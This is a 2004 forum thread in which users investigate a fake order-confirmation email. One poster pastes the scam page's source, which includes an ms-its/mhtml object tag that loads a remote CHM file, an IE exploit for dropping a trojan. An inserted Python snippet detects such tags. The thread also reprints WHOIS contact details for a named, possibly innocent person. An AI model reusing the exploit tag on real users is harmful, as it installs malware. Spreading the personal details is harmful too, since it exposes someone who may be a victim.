Another weird one...!


Graham
21-05-2004, 01:23
I've just had this e-mail turn up:

* * * * *

Thank you for your order!

You order summary:

IBM ThinkPad R50 Intel Pentium 1700 Mhz
512Mb RAM, 40 Gb Hard Drive, 15 " TFT XGA, 64Mb Shared Graphics, MS Works 7.0 Software, 5 x USB Connections, Windows XP Home Edition,
1 Year Free Warranty

Your bank account is billed for:

£1099.9 9 (inc. VAT)

Your order would be shipped to the address confirmed at order.
To track your order visit:

http://sunairthebest.org/index.html?trackorder=29992kkE999

To cancel or delay the order visit:

http://sunairthebest.org/index.html?stoporder=29992kkE999


Thank you for choosing Sun Light Electronics!

SunLight Electronics
London UK
http://sunairthebest.org/

* * * * *

Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.

Anyone seen/know anything about this one?

Chris W
21-05-2004, 01:29
Are you sure that they were genuine links rather than links to .scr files on your local machine? I have had a lot of mails lately with this kind of thing on. I am sorely tempted to open the links you have given... but I think I should resist....!

EDIT: Couldn't resist!! Page source appears as follows....

<html>
<head>
<title></title>
</head>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
<h3>the page is removed for hosting policy violation</h3>
</body>
</html>
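
A defender-side triage sketch for the page source quoted above, added here as an example and not part of the original thread: it flags tag attributes that use the `ms-its:` handler (plus the sibling `its:` and `mk:@MSITStore:` handlers, an added generalisation) and splits the `mhtml:` reference into local container, remote archive and inner page. The function and class names are hypothetical; the sample is the markup from the post, trimmed.

```python
import re
from html.parser import HTMLParser

# InfoTech Storage protocol handlers; only ms-its: appears in the thread,
# the other two are included as an assumption about what else to flag.
ITS_SCHEMES = ("ms-its:", "its:", "mk:@msitstore:")
# Layout seen in the post: mhtml:<local container>!<remote archive>::<inner page>
MHTML_RE = re.compile(
    r"mhtml:(?P<container>[^!]+)!(?P<remote>https?://.+?)::(?P<inner>/.*)$", re.I)
URL_ATTRS = {"data", "src", "href", "codebase"}
FIELDS = ("container", "remote", "inner")


class ItsRefFinder(HTMLParser):
    """Collect tag attributes that point at an ITS/MHTML-wrapped archive."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            v = value.strip()
            if not v.lower().startswith(ITS_SCHEMES):
                continue
            m = MHTML_RE.search(v)
            # Record the hit even if the mhtml: part does not parse.
            parts = m.groupdict() if m else dict.fromkeys(FIELDS)
            self.findings.append({"tag": tag, "attr": name, **parts})


def scan(html_text):
    """Return one finding dict per suspicious attribute in html_text."""
    finder = ItsRefFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


# Markup from the post above (trimmed to the relevant elements).
SAMPLE = r'''<html>
<body>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://sunairthebest.org//main1.chm::/main1.html" type="text/x-scriptlet"></object>
<h1>404 Not found</h1>
</body>
</html>'''

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The "404 Not found" heading is ordinary page content, so a check that only looks at visible text would miss the `<object>` element that sits above it.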

punky
21-05-2004, 01:30
Ordinarily, I would have said some muppet typed in your address by mistake. (Happens to me a lot, I get loads of e-mails from boards and website services where Grace and Gerry tried to sign up to something), but.... The site seems a bit weird. An electronics company trading as an Org? I've done a whois on it, and it looks a bit suspect. The fact the page has been taken down for a "hosting policy violation" meant it was probably a fake site for fleecing people.

Graham
21-05-2004, 01:34
Ordinarily, I would have said some muppet typed in your address by mistake.

It's unlikely that someone would have accidentally typed my affordable leather domain in by mistake!! :)

The fact the page has been taken down for a "hosting policy violation" meant it was probably a fake site for fleecing people.

Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.

punky
21-05-2004, 01:38
Yes, I was just wondering exactly what the scam was. I figured that because it's got the "stop" address, it's maybe trying to confirm addresses for future spam, but I don't know.

I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)


Registrant Name:LEW inc
Registrant Organization:LEW inc
Registrant Street1:200 Sutton Passeys Crescent
Registrant City:Wollaton
Registrant State/Province:NA
Registrant Postal Code:NG8 1DZ
Registrant Country:GB
Registrant Phone:+44.07899980958
Registrant FAX:+613.86242499
Registrant Email:hillaryjknowles@yahoo.co.uk

Chris
21-05-2004, 07:53
I suppose whatever nefarious act it was doing, it's finished with now, because the host company has pulled it. However, if you email hillaryjknowles@yahoo.co.uk and ask her reeeeeally nice, she might tell you :)
Or we could phone her ... anyone dare? :D

Jon M
21-05-2004, 08:34
Don't forget that spammers will often fake name/details of a company purely to get innocent businesses into trouble.

See the 5th post on my spam fighting thread where "Joe Jobbing" is explained:

http://www.cableforum.co.uk/board/showthread.php?t=10441

Simply doing a WHOIS on a domain, without checking the email header, will often lead you to the innocent party.

* I'm not saying that this is the case for the above situation, just that it's worth keeping in mind when investigating spam.

Graham
24-05-2004, 19:23
I've just had this e-mail turn up:

* * * * *

Thank you for your order!

You order summary:

IBM ThinkPad R50 Intel Pentium 1700 Mhz

* * * * *

Now I, of course, haven't ordered this and I presume it's some sort of scam, but the site has already been deleted, so I've no idea exactly what it was trying to pull.

A follow up to this:

http://www.theregister.co.uk/2004/05/24/fake_order_viral_scam/

Apparently it's an attempt to con people into allowing a trojan onto their computer to exploit a new IE vuln.

Since I use Netscape I'm not worrying, but if anyone who uses IE did get to look at the site before it was pulled, they'd better do a virus check.